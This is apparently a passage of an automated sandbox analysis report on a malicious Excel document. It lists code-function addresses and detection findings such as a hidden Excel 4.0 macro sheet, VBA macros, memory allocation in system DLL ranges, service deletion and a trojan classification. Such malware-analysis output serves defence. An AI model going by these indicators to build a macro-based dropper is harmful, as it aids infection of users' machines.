Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073C309 12_2_0073C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073BD0F 12_2_0073BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00742BF6 12_2_00742BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074EBFF 12_2_0074EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007445CD 12_2_007445CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074D3C8 12_2_0074D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073CFCE 12_2_0073CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00747BCA 12_2_00747BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00733FB8 12_2_00733FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00732FA1 12_2_00732FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007441A7 12_2_007441A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074C9A9 12_2_0074C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007499AA 12_2_007499AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00751993 12_2_00751993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00731F9B 12_2_00731F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00737B82 12_2_00737B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00749186 12_2_00749186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0074C38F 12_2_0074C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073F58F 12_2_0073F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073FD8C 12_2_0073FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10036007 13_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10041050 13_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1003130F 13_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100323E2 13_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10030460 13_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10041592 13_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1003E59F 13_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1003960C 13_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100317E2 13_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10040B0E 13_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10031BB6 13_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10041C56 13_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10036CB5 13_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_1001CD16 13_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10042D21 13_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10031FC2 13_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00609700 13_2_00609700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00615CF9 13_2_00615CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00615040 13_2_00615040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006070ED 13_2_006070ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00606083 13_2_00606083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061109E 13_2_0061109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060F154 13_2_0060F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061A156 13_2_0061A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060911A 13_2_0060911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006141A7 13_2_006141A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00619186 13_2_00619186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061026B 13_2_0061026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060E243 13_2_0060E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061129C 13_2_0061129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060C309 13_2_0060C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061D3C8 13_2_0061D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061C38F 13_2_0061C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061B391 13_2_0061B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0062146E 13_2_0062146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061A429 13_2_0061A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061542E 13_2_0061542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060B41A 13_2_0060B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006164F1 13_2_006164F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006044FA 13_2_006044FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006204DE 13_2_006204DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006174DD 13_2_006174DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006104B8 13_2_006104B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061E498 13_2_0061E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00613512 13_2_00613512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006145CD 13_2_006145CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060F58F 13_2_0060F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00623672 13_2_00623672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00608650 13_2_00608650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061363D 13_2_0061363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061561F 13_2_0061561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060777B 13_2_0060777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00612753 13_2_00612753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060472E 13_2_0060472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00620867 13_2_00620867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00616864 13_2_00616864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060E86A 13_2_0060E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060C850 13_2_0060C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060B821 13_2_0060B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00611831 13_2_00611831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00602830 13_2_00602830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006088F4 13_2_006088F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061D8D7 13_2_0061D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006068DE 13_2_006068DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00610946 13_2_00610946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060194C 13_2_0060194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00601950 13_2_00601950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060F93D 13_2_0060F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061C9A9 13_2_0061C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006199AA 13_2_006199AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00621993 13_2_00621993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00609A7D 13_2_00609A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060CA43 13_2_0060CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00606A1F 13_2_00606A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060AB66 13_2_0060AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060BB4B 13_2_0060BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00621B54 13_2_00621B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00614B56 13_2_00614B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00612BF6 13_2_00612BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061EBFF 13_2_0061EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00617BCA 13_2_00617BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00607B82 13_2_00607B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00606C29 13_2_00606C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061ACD3 13_2_0061ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061CC89 13_2_0061CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060EC9B 13_2_0060EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00618D71 13_2_00618D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00613D41 13_2_00613D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00620D5B 13_2_00620D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00610D33 13_2_00610D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060BD0F 13_2_0060BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060FD8C 13_2_0060FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00608D95 13_2_00608D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00606ED6 13_2_00606ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061BE8C 13_2_0061BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061EE94 13_2_0061EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060AE9A 13_2_0060AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0061FF31 13_2_0061FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060CFCE 13_2_0060CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00602FA1 13_2_00602FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00603FB8 13_2_00603FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00601F9B 13_2_00601F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A04B8 14_2_002A04B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002ABE8C 14_2_002ABE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029EC9B 14_2_0029EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AE498 14_2_002AE498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AEE94 14_2_002AEE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002970ED 14_2_002970ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A5CF9 14_2_002A5CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A74DD 14_2_002A74DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029F93D 14_2_0029F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00299700 14_2_00299700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A3512 14_2_002A3512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002B1B54 14_2_002B1B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AB391 14_2_002AB391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00298D95 14_2_00298D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00296C29 14_2_00296C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AA429 14_2_002AA429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A542E 14_2_002A542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029B821 14_2_0029B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A363D 14_2_002A363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00292830 14_2_00292830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A1831 14_2_002A1831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029B41A 14_2_0029B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A561F 14_2_002A561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00296A1F 14_2_00296A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A026B 14_2_002A026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029E86A 14_2_0029E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002B146E 14_2_002B146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002B0867 14_2_002B0867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A6864 14_2_002A6864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00299A7D 14_2_00299A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002B3672 14_2_002B3672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029CA43 14_2_0029CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A5040 14_2_002A5040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029E243 14_2_0029E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029C850 14_2_0029C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00298650 14_2_00298650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002ACC89 14_2_002ACC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00296083 14_2_00296083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029AE9A 14_2_0029AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A109E 14_2_002A109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A129C 14_2_002A129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002944FA 14_2_002944FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A64F1 14_2_002A64F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002988F4 14_2_002988F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002B04DE 14_2_002B04DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002968DE 14_2_002968DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AACD3 14_2_002AACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AD8D7 14_2_002AD8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00296ED6 14_2_00296ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029472E 14_2_0029472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A0D33 14_2_002A0D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AFF31 14_2_002AFF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029C309 14_2_0029C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029BD0F 14_2_0029BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029911A 14_2_0029911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029AB66 14_2_0029AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029777B 14_2_0029777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A8D71 14_2_002A8D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029BB4B 14_2_0029BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029194C 14_2_0029194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A3D41 14_2_002A3D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A0946 14_2_002A0946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002B0D5B 14_2_002B0D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00291950 14_2_00291950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A2753 14_2_002A2753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AA156 14_2_002AA156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A4B56 14_2_002A4B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029F154 14_2_0029F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A99AA 14_2_002A99AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AC9A9 14_2_002AC9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00292FA1 14_2_00292FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A41A7 14_2_002A41A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00293FB8 14_2_00293FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AC38F 14_2_002AC38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029FD8C 14_2_0029FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029F58F 14_2_0029F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00297B82 14_2_00297B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A9186 14_2_002A9186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00291F9B 14_2_00291F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002B1993 14_2_002B1993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AEBFF 14_2_002AEBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A2BF6 14_2_002A2BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A7BCA 14_2_002A7BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002AD3C8 14_2_002AD3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002A45CD 14_2_002A45CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029CFCE 14_2_0029CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00285CF9 16_2_00285CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00279700 16_2_00279700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028A429 16_2_0028A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028542E 16_2_0028542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027B821 16_2_0027B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00276C29 16_2_00276C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028363D 16_2_0028363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00272830 16_2_00272830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00281831 16_2_00281831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028561F 16_2_0028561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00276A1F 16_2_00276A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027B41A 16_2_0027B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028026B 16_2_0028026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0029146E 16_2_0029146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00286864 16_2_00286864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027E86A 16_2_0027E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00290867 16_2_00290867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00279A7D 16_2_00279A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00293672 16_2_00293672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027CA43 16_2_0027CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027E243 16_2_0027E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00285040 16_2_00285040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027C850 16_2_0027C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00278650 16_2_00278650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002804B8 16_2_002804B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028CC89 16_2_0028CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_00276083 16_2_00276083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028BE8C 16_2_0028BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028E498 16_2_0028E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028129C 16_2_0028129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028109E 16_2_0028109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027EC9B 16_2_0027EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0028EE94 16_2_0028EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027AE9A 16_2_0027AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002770ED 16_2_002770ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002788F4 16_2_002788F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002864F1 16_2_002864F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002744FA 16_2_002744FA
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 36E8.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Found a hidden Excel 4.0 Macro sheet
Source: DOCUMENT_2801.xls Macro extractor: Sheet name: Macro3
Source: DOCUMENT_2801.xls Macro extractor: Sheet name: Macro3
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Contains functionality to delete services
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029C67D DeleteService, 14_2_0029C67D
Yara signature match
Source: DOCUMENT_2801.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\DOCUMENT_2801.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Hzcvqvi\ Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Document contains embedded VBA macros
Source: DOCUMENT_2801.xls OLE indicator, VBA macros: true
Source: DOCUMENT_2801.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/9@1/35
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: DOCUMENT_2801.xls OLE indicator, Workbook stream: true
Source: DOCUMENT_2801.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 11_2_100125C0
Source: DOCUMENT_2801.xls ReversingLabs: Detection: 16%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ...................J............M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .[.V.e.r.s.i.o.n. .6...1...7.6.0.1.].................H....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................L...............................d1......................8.Hb............`{.J.......J............8............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................L...............................d1......................8.Hb............`{.J.......J....................~....................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................L...............................d1......................8.Hb............`{.J.......J............8............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................L.......................................................x.Hb...............J.......J............x............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................L...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................L.......................................................A....... ..J....................x..J............Z..................J.... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................L...............................`!-.....................x.Hb......,........J.......J............x............................... Jump to behavior
Source: C:\Windows\System32\cmd.exe Console Write: ................L...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J.... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........w............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................p.4k....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................p.4k..... ..............................}..v....H.......0.................w............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................4k....................................}..v............0............................................... Jump to behavior
